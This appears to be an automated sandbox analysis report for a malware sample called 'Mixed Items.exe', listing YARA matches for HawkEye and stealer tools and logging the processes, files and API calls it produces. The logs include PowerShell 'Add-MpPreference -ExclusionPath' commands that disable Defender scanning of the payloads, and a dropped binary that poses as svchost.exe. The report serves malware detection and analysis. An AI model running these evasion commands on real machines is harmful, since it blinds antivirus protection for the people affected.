Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.2.hawkgoods.exe.7aa0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                        Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@52/33@22/7
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D84E52 AdjustTokenPrivileges,
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D84E1B AdjustTokenPrivileges,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\WindowsAPIJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467Jump to behavior
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: unknownProcess created: C:\Windows\explorer.exe
                        Source: Mixed Items.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\Mixed Items.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                        Source: C:\Users\user\Desktop\Mixed Items.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: hawkgoods.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: hawkgoods.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: hawkgoods.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: hawkgoods.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: hawkgoods.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: hawkgoods.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: Mixed Items.exeReversingLabs: Detection: 17%
                        Source: C:\Users\user\Desktop\Mixed Items.exeFile read: C:\Users\user\Desktop\Mixed Items.exe:Zone.IdentifierJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe 'C:\Users\user\Desktop\Mixed Items.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: unknownProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0
                        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: unknown unknown
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                        Source: C:\Users\user\Desktop\Mixed Items.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: Mixed Items.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
